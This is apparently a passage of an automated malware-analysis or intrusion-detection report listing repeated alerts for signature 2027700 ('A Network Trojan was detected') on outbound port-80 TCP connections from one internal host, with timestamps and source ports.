                          Timestamp:192.168.2.562.204.41.449957802027700 02/06/23-14:18:00.788642
                          SID:2027700
                          Source Port:49957
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450092802027700 02/06/23-14:18:37.397614
                          SID:2027700
                          Source Port:50092
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450179802027700 02/06/23-14:19:00.072207
                          SID:2027700
                          Source Port:50179
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449827802027700 02/06/23-14:17:24.402563
                          SID:2027700
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449756802027700 02/06/23-14:17:00.296702
                          SID:2027700
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450233802027700 02/06/23-14:19:15.000212
                          SID:2027700
                          Source Port:50233
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449929802027700 02/06/23-14:17:52.146320
                          SID:2027700
                          Source Port:49929
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449797802027700 02/06/23-14:17:16.911714
                          SID:2027700
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450032802027700 02/06/23-14:18:20.769004
                          SID:2027700
                          Source Port:50032
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449740802027700 02/06/23-14:16:53.015336
                          SID:2027700
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449994802027700 02/06/23-14:18:09.678156
                          SID:2027700
                          Source Port:49994
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450121802027700 02/06/23-14:18:44.477396
                          SID:2027700
                          Source Port:50121
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450162802027700 02/06/23-14:18:56.026170
                          SID:2027700
                          Source Port:50162
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450073802027700 02/06/23-14:18:32.799222
                          SID:2027700
                          Source Port:50073
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449900802027700 02/06/23-14:17:44.895342
                          SID:2027700
                          Source Port:49900
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449941802027700 02/06/23-14:17:56.852297
                          SID:2027700
                          Source Port:49941
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450217802027700 02/06/23-14:19:11.137962
                          SID:2027700
                          Source Port:50217
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449953802027700 02/06/23-14:17:59.850998
                          SID:2027700
                          Source Port:49953
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449944802027700 02/06/23-14:17:57.633329
                          SID:2027700
                          Source Port:49944
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450119802027700 02/06/23-14:18:44.008779
                          SID:2027700
                          Source Port:50119
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449855802027700 02/06/23-14:17:31.349237
                          SID:2027700
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450036802027700 02/06/23-14:18:21.758203
                          SID:2027700
                          Source Port:50036
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450208802027700 02/06/23-14:19:07.190881
                          SID:2027700
                          Source Port:50208
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449769802027700 02/06/23-14:17:03.541604
                          SID:2027700
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449938802027700 02/06/23-14:17:56.145928
                          SID:2027700
                          Source Port:49938
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450220802027700 02/06/23-14:19:11.858797
                          SID:2027700
                          Source Port:50220
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450045802027700 02/06/23-14:18:23.896931
                          SID:2027700
                          Source Port:50045
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449883802027700 02/06/23-14:17:40.633559
                          SID:2027700
                          Source Port:49883
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450051802027700 02/06/23-14:18:25.382182
                          SID:2027700
                          Source Port:50051
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449916802027700 02/06/23-14:17:48.720590
                          SID:2027700
                          Source Port:49916
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450134802027700 02/06/23-14:18:47.648864
                          SID:2027700
                          Source Port:50134
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449785802027700 02/06/23-14:17:07.425626
                          SID:2027700
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449972802027700 02/06/23-14:18:04.364385
                          SID:2027700
                          Source Port:49972
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450106802027700 02/06/23-14:18:40.803738
                          SID:2027700
                          Source Port:50106
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449966802027700 02/06/23-14:18:02.959272
                          SID:2027700
                          Source Port:49966
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450017802027700 02/06/23-14:18:17.179298
                          SID:2027700
                          Source Port:50017
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449712802027700 02/06/23-14:16:34.380434
                          SID:2027700
                          Source Port:49712
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449801802027700 02/06/23-14:17:17.902350
                          SID:2027700
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449925802027700 02/06/23-14:17:50.890187
                          SID:2027700
                          Source Port:49925
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450236802027700 02/06/23-14:19:15.762067
                          SID:2027700
                          Source Port:50236
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449842802027700 02/06/23-14:17:28.111422
                          SID:2027700
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449753802027700 02/06/23-14:16:59.551732
                          SID:2027700
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449699802027700 02/06/23-14:16:30.811358
                          SID:2027700
                          Source Port:49699
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449772802027700 02/06/23-14:17:04.254514
                          SID:2027700
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450188802027700 02/06/23-14:19:02.215108
                          SID:2027700
                          Source Port:50188
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450023802027700 02/06/23-14:18:18.602365
                          SID:2027700
                          Source Port:50023
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450064802027700 02/06/23-14:18:28.682743
                          SID:2027700
                          Source Port:50064
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450147802027700 02/06/23-14:18:52.469914
                          SID:2027700
                          Source Port:50147
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450151802027700 02/06/23-14:18:53.414300
                          SID:2027700
                          Source Port:50151
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449979802027700 02/06/23-14:18:06.054835
                          SID:2027700
                          Source Port:49979
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449921802027700 02/06/23-14:17:49.926933
                          SID:2027700
                          Source Port:49921
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450068802027700 02/06/23-14:18:29.946527
                          SID:2027700
                          Source Port:50068
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450246802027700 02/06/23-14:19:18.198358
                          SID:2027700
                          Source Port:50246
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449743802027700 02/06/23-14:16:53.921247
                          SID:2027700
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449771802027700 02/06/23-14:17:04.019414
                          SID:2027700
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449899802027700 02/06/23-14:17:44.645815
                          SID:2027700
                          Source Port:49899
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450010802027700 02/06/23-14:18:15.475260
                          SID:2027700
                          Source Port:50010
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450123802027700 02/06/23-14:18:44.976744
                          SID:2027700
                          Source Port:50123
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449838802027700 02/06/23-14:17:27.131716
                          SID:2027700
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450184802027700 02/06/23-14:19:01.259062
                          SID:2027700
                          Source Port:50184
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450105802027700 02/06/23-14:18:40.574553
                          SID:2027700
                          Source Port:50105
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449700802027700 02/06/23-14:16:31.043767
                          SID:2027700
                          Source Port:49700
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449856802027700 02/06/23-14:17:31.586279
                          SID:2027700
                          Source Port:49856
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449833802027700 02/06/23-14:17:25.956224
                          SID:2027700
                          Source Port:49833
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449874802027700 02/06/23-14:17:38.440488
                          SID:2027700
                          Source Port:49874
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449894802027700 02/06/23-14:17:43.316977
                          SID:2027700
                          Source Port:49894
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449911802027700 02/06/23-14:17:47.534707
                          SID:2027700
                          Source Port:49911
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450274802027700 02/06/23-14:19:24.966329
                          SID:2027700
                          Source Port:50274
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450256802027700 02/06/23-14:19:20.620519
                          SID:2027700
                          Source Port:50256
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450078802027700 02/06/23-14:18:33.994128
                          SID:2027700
                          Source Port:50078
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449715802027700 02/06/23-14:16:35.302872
                          SID:2027700
                          Source Port:49715
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449733802027700 02/06/23-14:16:51.368597
                          SID:2027700
                          Source Port:49733
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450096802027700 02/06/23-14:18:38.394554
                          SID:2027700
                          Source Port:50096
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450156802027700 02/06/23-14:18:54.587906
                          SID:2027700
                          Source Port:50156
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450228802027700 02/06/23-14:19:13.781550
                          SID:2027700
                          Source Port:50228
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449805802027700 02/06/23-14:17:18.884453
                          SID:2027700
                          Source Port:49805
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449781802027700 02/06/23-14:17:06.429230
                          SID:2027700
                          Source Port:49781
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449710802027700 02/06/23-14:16:33.533909
                          SID:2027700
                          Source Port:49710
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450115802027700 02/06/23-14:18:43.044125
                          SID:2027700
                          Source Port:50115
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450133802027700 02/06/23-14:18:47.416110
                          SID:2027700
                          Source Port:50133
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450174802027700 02/06/23-14:18:58.884943
                          SID:2027700
                          Source Port:50174
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449828802027700 02/06/23-14:17:24.646925
                          SID:2027700
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450027802027700 02/06/23-14:18:19.567097
                          SID:2027700
                          Source Port:50027
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449751802027700 02/06/23-14:16:59.053794
                          SID:2027700
                          Source Port:49751
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449846802027700 02/06/23-14:17:29.052087
                          SID:2027700
                          Source Port:49846
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450205802027700 02/06/23-14:19:06.323850
                          SID:2027700
                          Source Port:50205
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449705802027700 02/06/23-14:16:32.323528
                          SID:2027700
                          Source Port:49705
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449962802027700 02/06/23-14:18:02.000570
                          SID:2027700
                          Source Port:49962
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449990802027700 02/06/23-14:18:08.739973
                          SID:2027700
                          Source Port:49990
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450113802027700 02/06/23-14:18:42.545396
                          SID:2027700
                          Source Port:50113
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449702802027700 02/06/23-14:16:31.544827
                          SID:2027700
                          Source Port:49702
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449730802027700 02/06/23-14:16:44.596890
                          SID:2027700
                          Source Port:49730
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449876802027700 02/06/23-14:17:38.908848
                          SID:2027700
                          Source Port:49876
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450143802027700 02/06/23-14:18:51.490212
                          SID:2027700
                          Source Port:50143
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449818802027700 02/06/23-14:17:22.140346
                          SID:2027700
                          Source Port:49818
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450146802027700 02/06/23-14:18:52.228128
                          SID:2027700
                          Source Port:50146
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449693802027700 02/06/23-14:16:29.330240
                          SID:2027700
                          Source Port:49693
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449698802027700 02/06/23-14:16:30.576133
                          SID:2027700
                          Source Port:49698
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449989802027700 02/06/23-14:18:08.504518
                          SID:2027700
                          Source Port:49989
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449871802027700 02/06/23-14:17:37.725069
                          SID:2027700
                          Source Port:49871
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449897802027700 02/06/23-14:17:44.164540
                          SID:2027700
                          Source Port:49897
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449815802027700 02/06/23-14:17:21.391573
                          SID:2027700
                          Source Port:49815
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450100802027700 02/06/23-14:18:39.335819
                          SID:2027700
                          Source Port:50100
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449807802027700 02/06/23-14:17:19.395600
                          SID:2027700
                          Source Port:49807
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450098802027700 02/06/23-14:18:38.869062
                          SID:2027700
                          Source Port:50098
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449848802027700 02/06/23-14:17:29.531648
                          SID:2027700
                          Source Port:49848
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450141802027700 02/06/23-14:18:50.069928
                          SID:2027700
                          Source Port:50141
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449784802027700 02/06/23-14:17:07.177698
                          SID:2027700
                          Source Port:49784
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450182802027700 02/06/23-14:19:00.788880
                          SID:2027700
                          Source Port:50182
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450218802027700 02/06/23-14:19:11.381609
                          SID:2027700
                          Source Port:50218
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450259802027700 02/06/23-14:19:21.359170
                          SID:2027700
                          Source Port:50259
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450000802027700 02/06/23-14:18:11.377143
                          SID:2027700
                          Source Port:50000
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449889802027700 02/06/23-14:17:42.087363
                          SID:2027700
                          Source Port:49889
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449713802027700 02/06/23-14:16:34.634243
                          SID:2027700
                          Source Port:49713
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450041802027700 02/06/23-14:18:22.955497
                          SID:2027700
                          Source Port:50041
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450118802027700 02/06/23-14:18:43.766872
                          SID:2027700
                          Source Port:50118
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450171802027700 02/06/23-14:18:58.166616
                          SID:2027700
                          Source Port:50171
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449843802027700 02/06/23-14:17:28.350642
                          SID:2027700
                          Source Port:49843
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449884802027700 02/06/23-14:17:40.878750
                          SID:2027700
                          Source Port:49884
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450248802027700 02/06/23-14:19:18.703803
                          SID:2027700
                          Source Port:50248
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449881802027700 02/06/23-14:17:40.148507
                          SID:2027700
                          Source Port:49881
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450154802027700 02/06/23-14:18:54.119780
                          SID:2027700
                          Source Port:50154
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450243802027700 02/06/23-14:19:17.486100
                          SID:2027700
                          Source Port:50243
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449970802027700 02/06/23-14:18:03.894708
                          SID:2027700
                          Source Port:49970
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449774802027700 02/06/23-14:17:04.719767
                          SID:2027700
                          Source Port:49774
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450047802027700 02/06/23-14:18:24.370968
                          SID:2027700
                          Source Port:50047
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449835802027700 02/06/23-14:17:26.426113
                          SID:2027700
                          Source Port:49835
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449924802027700 02/06/23-14:17:50.645406
                          SID:2027700
                          Source Port:49924
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450065802027700 02/06/23-14:18:28.913263
                          SID:2027700
                          Source Port:50065
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450019802027700 02/06/23-14:18:17.663562
                          SID:2027700
                          Source Port:50019
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450215802027700 02/06/23-14:19:10.669293
                          SID:2027700
                          Source Port:50215
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449746802027700 02/06/23-14:16:57.847861
                          SID:2027700
                          Source Port:49746
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449942802027700 02/06/23-14:17:57.083818
                          SID:2027700
                          Source Port:49942
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450108802027700 02/06/23-14:18:41.274401
                          SID:2027700
                          Source Port:50108
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450187802027700 02/06/23-14:19:01.971976
                          SID:2027700
                          Source Port:50187
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449853802027700 02/06/23-14:17:30.867273
                          SID:2027700
                          Source Port:49853
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449764802027700 02/06/23-14:17:02.319285
                          SID:2027700
                          Source Port:49764
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450031802027700 02/06/23-14:18:20.511059
                          SID:2027700
                          Source Port:50031
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450120802027700 02/06/23-14:18:44.246465
                          SID:2027700
                          Source Port:50120
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450126802027700 02/06/23-14:18:45.717300
                          SID:2027700
                          Source Port:50126
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449952802027700 02/06/23-14:17:59.609624
                          SID:2027700
                          Source Port:49952
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450037802027700 02/06/23-14:18:21.991529
                          SID:2027700
                          Source Port:50037
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449958802027700 02/06/23-14:18:01.022168
                          SID:2027700
                          Source Port:49958
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450003802027700 02/06/23-14:18:13.453554
                          SID:2027700
                          Source Port:50003
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449863802027700 02/06/23-14:17:35.672249
                          SID:2027700
                          Source Port:49863
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450192802027700 02/06/23-14:19:03.186396
                          SID:2027700
                          Source Port:50192
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449792802027700 02/06/23-14:17:12.357233
                          SID:2027700
                          Source Port:49792
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449869802027700 02/06/23-14:17:37.244652
                          SID:2027700
                          Source Port:49869
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449999802027700 02/06/23-14:18:11.060496
                          SID:2027700
                          Source Port:49999
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450088802027700 02/06/23-14:18:36.403853
                          SID:2027700
                          Source Port:50088
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450110802027700 02/06/23-14:18:41.820358
                          SID:2027700
                          Source Port:50110
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450021802027700 02/06/23-14:18:18.134393
                          SID:2027700
